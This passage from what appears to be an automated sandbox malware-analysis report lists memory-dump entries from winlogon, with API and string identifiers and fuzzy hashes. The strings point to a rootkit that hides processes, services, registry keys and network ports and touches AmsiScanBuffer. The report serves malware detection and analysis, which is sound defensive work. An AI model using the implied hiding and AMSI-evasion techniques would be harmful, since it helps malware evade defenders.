                                            • Source File: 00000008.00000003.1732974344.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_3_1ca7d1b0000_winlogon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
                                            • Instruction ID: ca34dd41252b53d4a5cff9c5e57dc41cb2ffb1eb775b14f4f42dfe15e54293e6
                                            • Opcode Fuzzy Hash: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
                                            • Instruction Fuzzy Hash: 541156B3A987D88BF75A9F6994517993790BB0438CFC48069D44986A94C73EC4D04F52
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                            • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                            • API String ID: 2135414181-3572789727
                                            • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction ID: fb15fa20126c4c6dafad04b3a9e0ce3b22ed315104faccb0dcb3aec83ba8768e
                                            • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction Fuzzy Hash: 7371F837B50B5889FB129F26E850A9A33A4FF88B8DF801112DD4D57B68DE26C446C3D2
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                            • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                            • API String ID: 2135414181-3572789727
                                            • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction ID: 2c83494e5a43262cfe800e831b7ec8651a9dabb613aca94f4580080f8d60cd14
                                            • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction Fuzzy Hash: CD711737B50B1985FB229F21E850AD833A4FF88B8CF819115ED4D47A28DE3AC546C3C6
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                            • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                            • API String ID: 1735320900-4225371247
                                            • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction ID: 68f115bde263472201ca07a53b25cff465ad2114566305ba7983a19ab3ffb222
                                            • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction Fuzzy Hash: FA516176E90B4EA5FB039B64E840EE53361FF8434DFC14512980926675AE7AC25BC3E3
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                            • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                            • API String ID: 1735320900-4225371247
                                            • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction ID: c27b5b2766e8a714269c9b7251a9534395d3fbc0594a058b2d3d4c984f6c3e2e
                                            • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction Fuzzy Hash: 47517A72A90B0EA5FB039B68E842ED83324BF4475CFC18916A40902575DE7BD25BC3E7
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                            • String ID: d
                                            • API String ID: 2005889112-2564639436
                                            • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction ID: 7a9e4dd526ab2a344e9bcf59a507826a2bcd43945c5cf18051587018948a7a67
                                            • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction Fuzzy Hash: 34513E33A50B889AE716CF62E4447AB77A1FBC8F99F844124DE4907758DF3DC04A8782
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                            • String ID: d
                                            • API String ID: 2005889112-2564639436
                                            • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction ID: 10435c65013aa49502dc7abc10a9fb8f475a20879a614cbceb8abb604b999947
                                            • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction Fuzzy Hash: E5516033A50B8896F722CF62E44979A77A1FB88F98F858124DE4907718DF3DD046C782
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                            • String ID: d
                                            • API String ID: 2005889112-2564639436
                                            • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction ID: c1dc221c099710ed114a4203ff786129722ca6648603eb70c6731709578373a2
                                            • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction Fuzzy Hash: 7151C073A45B8886F721CF62E41879A77A1FB88F89F844124DE4A03758DF3DC145C782
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                            • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                            • API String ID: 740688525-1880043860
                                            • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction ID: 35e59fce39fc26d4e588c545ceda4915201235a0509f46c42b5d2ee77a2c5ca4
                                            • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction Fuzzy Hash: 97519C33B4171851FA569B56A800BE632A0BF88BB9F9807259E39173D4DF3AD40686C3
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                            • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                            • API String ID: 740688525-1880043860
                                            • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction ID: 841100cd2b18d10c7530346504741f059c760433718e5c958d51dca8c66ea59f
                                            • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction Fuzzy Hash: 79518F33B4170851FA169B56A800BE57250BF48BB8FD88729AE3D073D4DF3AD54686C7
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU Engine(*)\Running Time
                                            • API String ID: 1943346504-1805530042
                                            • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction ID: 43c5e0d34ebc6dccf3a439a469952983112bd81c68c9bea665965f379fc87005
                                            • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction Fuzzy Hash: A431A033E44B4896F722CF12E804B9AB3A0FBC8B9AF8505259E4957624DF39C45787C2
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU Engine(*)\Running Time
                                            • API String ID: 1943346504-1805530042
                                            • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction ID: 752b222f9f1cd9264d68c2c53bbe3c21249311e990f53d32d649b7497d1e9cf2
                                            • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction Fuzzy Hash: 1A31E933E44B5896F722CF12A404B99B391FB88B98FC48528AD4843624DF3AD44383C6
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU Engine(*)\Running Time
                                            • API String ID: 1943346504-1805530042
                                            • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction ID: 5256ce4443abd153758bcd99e98d7bf0abd56920327f9ba419e77a24a63d0f90
                                            • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction Fuzzy Hash: C231C433E40B4996F722CF12E804B99B3A0FB88FCAF840614AE4943665DF39C555C382
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU Engine(*)\Utilization Percentage
                                            • API String ID: 1943346504-3507739905
                                            • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction ID: 5c16f09041be8b645f9990b675969fbfe91f0a43291d9b19f9330004a6e2f389
                                            • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction Fuzzy Hash: 1C31A233A44B4986F712DF22A444B9A73A0FBC8F99F844024DE4A57724DE39D446C3C2
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU Engine(*)\Utilization Percentage
                                            • API String ID: 1943346504-3507739905
                                            • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction ID: 01238701deea32749901f043c41a85233535f38141b80a811341c7053083115b
                                            • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction Fuzzy Hash: 9D31B433A44B4996F712DF12A444B9973A1BF88F98F858129DE4A43724DF3AE44782C3
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU Engine(*)\Utilization Percentage
                                            • API String ID: 1943346504-3507739905
                                            • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction ID: 8eab24d6d6144954bd2ca5cd0d15ee39b50dab67e5137aa515f9043b1a9d6d94
                                            • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction Fuzzy Hash: 07318433A50B4986F712DF12E854B9973E1BF84F9AF8440259E4A43724DF39D542C782
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000003.1732974344.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_3_1ca7d1b0000_winlogon.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 849930591-393685449
                                            • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                            • Instruction ID: db454895896c66f2aae9d4fb35f949d79ab27abdbeef052a67be09c4d4be01c7
                                            • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                            • Instruction Fuzzy Hash: E8D17C33A44B488AFB629F65D480BED77A0FB45B8CF900115EA8D57B96DB35C082C783
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 849930591-393685449
                                            • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction ID: e25051ce7f45a5f54960e9841c87e8732a799f56ae8f5b22f7c45591229d7051
                                            • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction Fuzzy Hash: CCD1CE33A447888AFB62CF2495407DD37A4FB4979DF901105EA8967B99CB35C482C7C3
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 849930591-393685449
                                            • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction ID: 93558ce561f458a496548046fa9771a477e4b847544d87466bd0439cd31ff69d
                                            • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction Fuzzy Hash: B2D1AC33A447888AFB62CB659540BDD77A0FB4578CF908119EA8957B96CB36C482C7C3
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 849930591-393685449
                                            • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction ID: 9fc1314c1b3568874932ff714da4d78103fade56a62ede063e1102c62ff8e334
